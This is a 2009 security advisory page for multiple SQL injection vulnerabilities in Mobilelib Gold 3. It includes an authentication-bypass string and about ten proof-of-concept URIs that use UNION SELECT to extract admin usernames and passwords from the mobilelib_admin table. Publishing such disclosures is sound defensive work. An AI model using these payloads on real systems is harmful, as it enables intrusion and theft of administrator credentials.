exploits , vulnerabilities , articles , Mobilelib Gold Multiple SQL Injection Vulnerabilities

Title	Mobilelib Gold Multiple SQL Injection Vulnerabilities
Published	2009-08-01-12:00AM
Updated	2009-08-05-04:34PM
Class	Input Validation Error
CVE
Remote	Yes
Local	No
Credit	SwEET-DeViL
Vulnerable	Mobilelib Mobilelib GOLD 3
Not Vulnerable
Code	Attackers can use a browser to exploit these issues.The following proof-of-concept and example URIs are available:username : 'or 1=1/*http://www.example.com/goldv3/artcat.php?cid=-1'+union+select+adminpass,2,adminn,4,5+from+mobilelib_admin/* http://www.example.com/goldv3/show.php?cat=games&catid=-1'+union+select+1,2,adminpass,4,5,adminn,7,8+from+mobilelib_admin/* http://www.example.com/goldv3/show.php?cat=pro&catid=-1'+union+select+1,2,adminn,adminpass,5,6,7,8,9+from+mobilelib_admin/* http://www.example.com/goldv3/show.php?cat=themes&catid=-1'+union+select+1,2,3,4,adminn,adminpass,7+from+mobilelib_admin/* http://www.example.com/goldv3/show.php?cat=wallpapers&catid=-1'+union+select+1,2,3,4,adminn,adminpass,7+from+mobilelib_admin/* http://www.example.com/goldv3/show.php?cat=blue&catid=-1'+union+select+1,2,adminpass,4,5,6,7,8+from+mobilelib_admin/* http://www.example.com/goldv3/show.php?cat=mms&catid=-1'+union+select+1,2,adminpass,4,5,6,7,8+from+mobilelib_admin/* http://www.example.com/goldv3/show.php?cat=sound&catid=-1'+union+select+1,2,adminpass,4,5,6,7,8,9+from+mobilelib_admin/* http://www.example.com/goldv3/show.php?cat=vido&catid=-1'+union+select+1,2,adminpass,4,5,6,7,8,9,10+from+mobilelib_admin/* http://www.example.com/goldv3/show.php?cat=msgs&catid=-1'+union+select+1,2,adminpass,4,5,6,7,8+from+mobilelib_admin/*
TXT

Vulnerabilities - newest 10 RSS | More

• 2009-12-11 Symantec Veritas VRTSweb Incoming Data Remote Code Execution Vulnerability
• 2009-12-11 HP OpenView Network Node Manager Perl CGI Executables Remote Code Execution Vulnerability
• 2009-12-11 HP OpenView Network Node Manager Unspecified Stack Buffer Overflow Vulnerability
• 2009-12-11 Joomla! JS Jobs Component Multiple SQL Injection Vulnerabilities
• 2009-12-11 RT Session Fixation Vulnerability
• 2009-12-11 Multiple HP LaserJet Printers Unauthorized Access and Denial of Service Vulnerability
• 2009-12-11 Sun Ray Server Authentication Manager Remote Code Execution Vulnerability
• 2009-12-10 GNU Coreutils Insecure Temporary File Creation Vulnerability
• 2009-12-10 WebKit SVG Animation Elements User After Free Remote Code Execution Vulnerability
• 2009-12-10 Moodle Multiple Vulnerabilities

• Vulnerabilities
• Exploits
• News
• Articles

Copyright 2007, SecurityDot
Sat, 12 Dec 2009 04:21:32 +0000